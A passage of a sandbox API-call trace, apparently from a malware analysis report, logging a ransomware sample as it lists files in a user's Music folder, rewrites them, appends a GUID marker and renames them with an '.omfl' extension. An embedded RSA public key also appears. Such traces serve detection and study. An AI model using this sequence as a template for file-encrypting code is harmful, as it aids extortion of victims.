hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.255] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.255] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.257] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0131.257] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e0697f0, ftCreationTime.dwHighDateTime=0x1d5dcf7, ftLastAccessTime.dwLowDateTime=0x19a10a70, ftLastAccessTime.dwHighDateTime=0x1d5e5ea, ftLastWriteTime.dwLowDateTime=0x19a10a70, ftLastWriteTime.dwHighDateTime=0x1d5e5ea, nFileSizeHigh=0x0, nFileSizeLow=0xe2ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gSAxGEO5d.wav", cAlternateFileName="GSAXGE~1.WAV")) returned 1 [0131.257] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gSAxGEO5d.wav") returned=".wav" [0131.257] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gSAxGEO5d.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gsaxgeo5d.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.257] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=58028) returned 1 [0131.257] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.260] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xe286, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.260] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.261] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xe2ac, lpOverlapped=0x0) returned 1 [0131.262] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.262] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.262] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.262] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.263] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.263] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.263] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.263] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.263] GetLastError () returned 0x0 [0131.263] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.263] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.263] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.263] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.263] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.263] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.263] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.264] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.264] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16fc8 | out: hHeap=0x4970000) returned 1 [0131.264] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16fe0 | out: hHeap=0x4970000) returned 1 [0131.264] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.264] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.264] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0131.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16fe0 [0131.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0131.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16fc8 [0131.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0131.264] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf068 [0131.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.265] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.265] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16fe0 | out: hHeap=0x4970000) returned 1 [0131.265] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.265] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16fc8 | out: hHeap=0x4970000) returned 1 [0131.265] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0131.265] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.265] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.265] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0131.265] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.265] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.265] GetCurrentThreadId () returned 0x618 [0131.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2d030 [0131.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0131.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.265] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.265] GetCurrentThreadId () returned 0x618 [0131.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.266] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.266] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.266] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.266] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.266] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.266] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16fc8 [0131.266] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa890 [0131.266] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.267] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0131.267] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.267] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16fe0 [0131.267] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0131.267] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0131.267] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.267] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16fb0 [0131.267] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.267] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0131.267] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.267] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0131.267] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xe2ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.268] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.268] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.268] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.268] CloseHandle (hObject=0x5c8) returned 1 [0131.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0xdd29950 [0131.273] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gSAxGEO5d.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gsaxgeo5d.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\gSAxGEO5d.wav.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gsaxgeo5d.wav.omfl")) returned 1 [0131.274] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55ee5c80, ftCreationTime.dwHighDateTime=0x1d5df50, ftLastAccessTime.dwLowDateTime=0x9f423390, ftLastAccessTime.dwHighDateTime=0x1d5e755, ftLastWriteTime.dwLowDateTime=0x9f423390, ftLastWriteTime.dwHighDateTime=0x1d5e755, nFileSizeHigh=0x0, nFileSizeLow=0xc975, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h sgC.mp3", cAlternateFileName="HSGC~1.MP3")) returned 1 [0131.274] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.274] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.274] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\h sgC.mp3") returned=".mp3" [0131.274] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\h sgC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h sgc.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.275] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=51573) returned 1 [0131.275] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.277] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xc94f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.277] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.278] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.278] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xc975, lpOverlapped=0x0) returned 1 [0131.279] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.279] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.279] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.279] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.279] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.280] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.280] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.280] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.280] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.280] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.280] GetLastError () returned 0x0 [0131.280] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.280] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.280] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.280] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.280] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.280] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.280] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.280] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.281] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xc975, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.281] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.281] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.281] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.281] CloseHandle (hObject=0x5c8) returned 1 [0131.284] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.284] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0xdd29950 [0131.285] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\h sgC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h sgc.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\h sgC.mp3.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\h sgc.mp3.omfl")) returned 1 [0131.286] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92b98ef0, ftCreationTime.dwHighDateTime=0x1d5db18, ftLastAccessTime.dwLowDateTime=0x495c5200, ftLastAccessTime.dwHighDateTime=0x1d5d9b6, ftLastWriteTime.dwLowDateTime=0x495c5200, ftLastWriteTime.dwHighDateTime=0x1d5d9b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H9ZDOLsEHsUNLx", cAlternateFileName="H9ZDOL~1")) returned 1 [0131.286] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.286] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2cf8 [0131.286] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2aa0 [0131.286] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5ed9640, ftCreationTime.dwHighDateTime=0x1d5db51, ftLastAccessTime.dwLowDateTime=0x133f3a00, ftLastAccessTime.dwHighDateTime=0x1d5dd5f, ftLastWriteTime.dwLowDateTime=0x133f3a00, ftLastWriteTime.dwHighDateTime=0x1d5dd5f, nFileSizeHigh=0x0, nFileSizeLow=0x119a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j-Drys.mp3", cAlternateFileName="")) returned 1 [0131.286] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.287] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.287] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\j-Drys.mp3") returned=".mp3" [0131.287] CreateFileW 